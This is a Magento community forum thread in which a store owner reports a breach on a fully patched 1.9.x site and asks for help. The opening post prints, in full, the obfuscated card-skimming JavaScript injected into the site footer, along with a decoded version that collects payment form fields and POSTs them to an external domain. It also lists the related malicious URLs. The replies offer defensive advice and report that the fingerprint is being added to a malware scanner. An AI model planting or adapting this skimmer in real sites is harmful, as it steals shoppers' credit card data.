cancel
Showing results for 
Search instead for 
Did you mean: 

Fully patched (1.9.2.4) and hacked

Fully patched (1.9.2.4) and hacked

Looks similar to the GuruIncSite attack. Malicious JS injected into design/footer/absolute_footer. The JS sends CC data to a site by ajax. 

 

We're fully patched and magereport found no known vulnerabilities, so thinking this might be a new attack vector.

 

The script was this

 

var _0xe0eb=["\x63\x68\x61\x6E\x67\x65","\x66\x6F\x72\x6D","\x73\x65\x6C\x65\x63\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6F\x70\x73\x5F\x63\x63\x5B\x79\x65\x61\x72\x5D\x22\x5D","\x73\x65\x6C\x65\x63\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x70\x61\x79\x6D\x65\x6E\x74\x5B\x63\x63\x5F\x65\x78\x70\x5F\x79\x65\x61\x72\x5D\x22\x5D","\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x65\x78\x70\x69\x72\x61\x74\x69\x6F\x6E\x22\x5D","\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x66\x75\x6C\x6C\x5F\x63\x63\x5F\x65\x78\x70\x69\x72\x61\x74\x69\x6F\x6E\x22\x5D","\x73\x65\x6C\x65\x63\x74\x5B\x69\x64\x3D\x22\x72\x65\x64\x65\x63\x61\x72\x64\x5F\x65\x78\x70\x69\x72\x61\x74\x69\x6F\x6E\x5F\x79\x72\x22\x5D","\x6C\x65\x6E\x67\x74\x68","\x76\x61\x6C","","\x69\x6E\x70\x75\x74\x2C\x20\x73\x65\x6C\x65\x63\x74\x2C\x20\x74\x65\x78\x74\x61\x72\x65\x61\x2C\x20\x63\x68\x65\x63\x6B\x62\x6F\x78","\x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72\x41\x6C\x6C","\x76\x61\x6C\x75\x65","\x6E\x61\x6D\x65","\x6A\x69\x6B","\x2D","\x72\x65\x70\x6C\x61\x63\x65","\x3D","\x26","\x26\x69\x64\x64\x3D","\x68\x6F\x73\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x6A\x2D\x6D\x6F\x64\x2E\x6C\x69\x6E\x6B\x2F\x6D\x61\x67\x2E\x70\x68\x70","\x50\x4F\x53\x54","\x6A\x73\x6F\x6E","\x61\x6A\x61\x78","\x6F\x6E"];setTimeout(function(){jQuery(function(_0x9760x1){_0x9760x1(document)[_0xe0eb[26]](_0xe0eb[0],_0xe0eb[1],function(){grelos_v= null;a= [_0xe0eb[2],_0xe0eb[3],_0xe0eb[4],_0xe0eb[5],_0xe0eb[6]];for(var _0x9760x2=0;_0x9760x2< 5;_0x9760x2++){try{if(_0x9760x1(a[_0x9760x2])[_0xe0eb[8]]()[_0xe0eb[7]]> 0){_0x9760x3()}}catch(e){}};function _0x9760x3(){var _0x9760x4=_0xe0eb[9];var _0x9760x5=document[_0xe0eb[11]](_0xe0eb[10]);for(var _0x9760x6=0;_0x9760x6< _0x9760x5[_0xe0eb[7]];_0x9760x6++){if(_0x9760x5[_0x9760x6][_0xe0eb[12]][_0xe0eb[7]]> 0){var _0x9760x7=_0x9760x5[_0x9760x6][_0xe0eb[13]];if(_0x9760x7== _0xe0eb[9]){_0x9760x7= _0xe0eb[14]+ _0x9760x6};var _0x9760x8=_0x9760x7[_0xe0eb[16]](/\[/g,_0xe0eb[15]);var _0x9760x9=_0x9760x8[_0xe0eb[16]](/-redecard/,_0xe0eb[9]);_0x9760x4+= _0x9760x9[_0xe0eb[16]](/]/g,_0xe0eb[9])+ _0xe0eb[17]+ _0x9760x5[_0x9760x6][_0xe0eb[12]]+ _0xe0eb[18]}};_0x9760x4= _0x9760x4+ _0xe0eb[19]+ window[_0xe0eb[21]][_0xe0eb[20]];_0x9760x1[_0xe0eb[25]]({url:_0xe0eb[22],data:_0x9760x4,type:_0xe0eb[23],dataType:_0xe0eb[24],success:function(_0x9760xa){return false},error:function(_0x9760xb,_0x9760xc,_0x9760xd){return false}})}})})},5000)

decoded looks like this

var func = ["change", "form", "select[name='ops_cc[year]']", "select[name='payment[cc_exp_year]']", "input[name='expiration ']", "input[name='full_cc_expiration ']", "select[id='redecard_expiration_yr ']", "length", "val", "", "input, select, textarea, checkbox", "querySelectorAll", "value", "name", "jik", "-", "replace", "=", "&", "&idd=", "host", "location", "https://sj-mod.link/mag.php", "POST", "json", "ajax", "on"];
setTimeout(function() {
    jQuery(function(func2) {
        func2(document)[func[26]](func[0], func[1], function() {
            grelos_v = null;
            a = [func[2], func[3], func[4], func[5], func[6]];
            for (var var1 = 0; var1 < 5; var1++) {
                try {
                    if (func2(a[var1])[func[8]]()[func[7]] > 0) {
                        func3()
                    }
                } catch (e) {}
            };

            function func3() {
                var a = func[9];
                var b = document[func[11]](func[10]);
                for (var c = 0; c < b[func[7]]; c++) {
                    if (b[c][func[12]][func[7]] > 0) {
                        var d = b[c][func[13]];
                        if (d == func[9]) {
                            d = func[14] + c
                        };
                        var e = d[func[16]](/\[/g, func[15]);
                        var f = e[func[16]](/-redecard/, func[9]);
                        a += f[func[16]](/]/g, func[9]) + func[17] + b[c][func[12]] + func[18]
                    }
                };
                a = a + func[19] + window[func[21]][func[20]];
                func2[func[25]]({
                    url: func[22],
                    data: a,
                    type: func[23],
                    dataType: func[24],
                    success: function() {
                        return false
                    },
                    error: function() {
                        return false
                    }
                })
            }
        })
    })
}, 5000)

 

Not sure how they gained access yet but I'm finding very very little on this 

 

related urls are

 

sj-mods.link

sj-mods.link/mag.php

sj-mods.link/mage.js

sj-mods.link/sj-mods/mage.js

 

urls similar to this on the same server are using js-save.link there are probably more.

 

In the code there is a grelos_v variable which also appears in this https://community.magento.com/t5/Security-Patches/Security-Issue-with-Magento-1-9-x-x-ccard-js/td-p/... our ccard.js is clean so it doesn't look like they got in using that.

7 REPLIES 7

Re: Fully patched (1.9.4) and hacked

Usually Magento is not the only attach vector. Sometimes computer has other packages installed, holes left unplugged. Sometimes Magento is just an innocent bystander which is now used to redistribute the payload.

 

Did you check magereport.com?

 

Also sometimes worm stay dormant after gaining access to the system and wake up weeks or months later. It could very well be that it's been in the system for a while.

Tanel Raja

Re: Fully patched (1.9.4) and hacked

I did check magereport and it found nothing to report.

 

I came across this from 21 days ago reporting something similar suggesting it was an SQL injection https://safeweb.norton.com/reviews/314807

Re: Fully patched (1.9.4) and hacked

This is a pretty bad hack as your losing card details, if it truly comes from SQL injection you should find the vulnerability asap as it will only happen again until its fixed.

 

You can grep through your logs for SQL injections quite easily but it can be CPU intensive if you have a large logs on a low powered server.

Regards
Sven

Re: Fully patched (1.9.4) and hacked

Hi @StudioMashbo

 

Even though you are using the latest version of the Magento there are many other possibilities which may compromise security.

Such as custom modules,a virus infected system used to access and deploy code, admin users which were created in past but not deactivated and not following Magento best practices.

 

Remove all suspicious files and ip restrict admin access for you magento site.

---
Problem Solved Click Accept as Solution!:Magento Community India Forum

Re: Fully patched (1.9.4) and hacked

That's what we're currently doing, we're auditing everything, scanning our logs for brute force attempts and sql injection attempts.

 

 

We follow best practices and have our own, we regularly patch our servers and the software installed, servers are locked down as much as we can, php is only runnable in very specific directories etc We've still not found the point of entry so to speak, but once we do I'll keep this thread up to date. We're leaning towards the site admins having really awful passwords at this point.

Re: Fully patched (1.9.4) and hacked

You could look to installing a FIM (like http://www.tripwire.com/it-security-software/scm/file-integrity-monitoring/) as a short term protection until you have found the insecurity.  

 

It may even help find the breach for you.

Regards
Sven

Re: Fully patched (1.9.4) and hacked

Thanks for reporting, we're adding this fingerprint to Magereport right now.

 

According to a quick check, some 500 other shops appear infected with this particular malware. 

 

Correction: some 1200 shops, on top of the shops that are infected with already known malware.